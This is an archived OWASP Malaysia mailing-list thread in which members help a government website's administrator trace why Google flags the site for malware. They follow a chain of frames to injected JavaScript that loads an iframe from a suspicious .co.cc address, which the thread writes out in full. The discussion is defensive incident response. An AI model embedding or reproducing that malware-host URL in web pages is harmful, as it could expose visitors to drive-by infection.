[Owasp-Malaysia] Malware Detected!

Adnan bin Mohd Shukor adnan.shukor at gmail.com
Tue Feb 8 04:21:57 EST 2011


Here is the flow:

1) your indexsedc.php has an iframe to sedc.php
2) and your sedc.php has an iframe to default.php
3) and in default.php (look at the last 2 lines), javascript will
actually create an iframe to
asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA==

thanks :)

On 8 February 2011 17:07, Mohd Syamsuri <msyamsuri at gmail.com> wrote:
> can you point...
> my index.htm or indexsedc.php or other file?
>
> On Tue, Feb 8, 2011 at 4:19 PM, Adnan bin Mohd Shukor
> <adnan.shukor at gmail.com> wrote:
>>
>> you have iframe pointed to
>> asfiuweof.co.cc/QQkFBg0AAQ0MBA0DEkcJBQYNAgAGBQUBDA==
>>
>> which is not xss :)
>>
>> >From my personal point of view, its either caused by:
>> 1) malware on pc which has been used for ftp/access to the server
>> 2) compromised server
>>
>> you can send your access.log to cyber999 at cybersecurity.my or
>> mycert at mycert.org.my for further analysis :)
>>
>> thanks
>>
>> On 8 February 2011 16:00, Mohd Syamsuri <msyamsuri at gmail.com> wrote:
>> > I have check it.
>> > On Tue, Feb 8, 2011 at 3:49 PM, Rasta Boy <rastaboyz at gmail.com> wrote:
>> >>
>> >> Hi Mohd Symsuri,
>> >>
>> >> Why dont you check on the reason why its being blocked, it might help.
>> >>
>> >>
>> >>
>> >> http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=http://www.pkink.gov.my/
>> >>
>> >>
>> >>
>> >> http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=AS:4788
>> >>
>> >> Regards,
>> >> Kishur
>> >>
>> >>
>> >>
>> >> On Tue, Feb 8, 2011 at 3:19 PM, Mohd Syamsuri <msyamsuri at gmail.com>
>> >> wrote:
>> >>>
>> >>> Assalamualikum and Good day for my fellow friends.
>> >>> I need some advise.
>> >>> Web site Perbadanan kemajuan Iktisad Negeri Kelantan
>> >>> (http://www.pkink.gov.my) have been blocked by Google for almost 4
>> >>> days.
>> >>> It said that we host malware on our server Malware Detected! ( Google
>> >>> said that!!)
>> >>> What i did is..
>> >>> 1. Scan all the data and upload a new data
>> >>> 2. Check the index.html or index.php
>> >>> 3. Scan using web scanner using
>> >>> http://www.avgthreatlabs.com/
>> >>> http://www.virustotal.com
>> >>> but still get block..
>> >>> Googel said Suspected injected code
>> >>> <FRAME SRC="http://www2.pkink.gov.my/indexsedc.php" NAME="confcontent"
>> >>> scrolling=yes >
>> >>> I have using this code for almost 2 years
>> >>> What should i do now?
>> >>>
>> >>> --
>> >>> best regard
>> >>> syamsuri
>> >>>
>> >>>
>> >>>
>> >>> _______________________________________________
>> >>> Owasp-Malaysia mailing list
>> >>> Owasp-Malaysia at lists.owasp.org
>> >>> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>> >>>
>> >>> OWASP Malaysia Wiki
>> >>> http://www.owasp.org/index.php/Malaysia
>> >>>
>> >>> OWASP Malaysia Wiki Facebook
>> >>>
>> >>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>> >>
>> >>
>> >> _______________________________________________
>> >> Owasp-Malaysia mailing list
>> >> Owasp-Malaysia at lists.owasp.org
>> >> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>> >>
>> >> OWASP Malaysia Wiki
>> >> http://www.owasp.org/index.php/Malaysia
>> >>
>> >> OWASP Malaysia Wiki Facebook
>> >> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>> >
>> >
>> >
>> > --
>> > best regard
>> > syamsuri
>> >
>> >
>> >
>> > _______________________________________________
>> > Owasp-Malaysia mailing list
>> > Owasp-Malaysia at lists.owasp.org
>> > https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>> >
>> > OWASP Malaysia Wiki
>> > http://www.owasp.org/index.php/Malaysia
>> >
>> > OWASP Malaysia Wiki Facebook
>> > http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>> >
>> _______________________________________________
>> Owasp-Malaysia mailing list
>> Owasp-Malaysia at lists.owasp.org
>> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>>
>> OWASP Malaysia Wiki
>> http://www.owasp.org/index.php/Malaysia
>>
>> OWASP Malaysia Wiki Facebook
>> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>
>
>
> --
> best regard
> syamsuri
>
>
>
> _______________________________________________
> Owasp-Malaysia mailing list
> Owasp-Malaysia at lists.owasp.org
> https://lists.owasp.org/mailman/listinfo/owasp-malaysia
>
> OWASP Malaysia Wiki
> http://www.owasp.org/index.php/Malaysia
>
> OWASP Malaysia Wiki Facebook
> http://www.facebook.com/pages/OWASP-Malaysia-Local-Chapter/295989208420
>


More information about the Owasp-Malaysia mailing list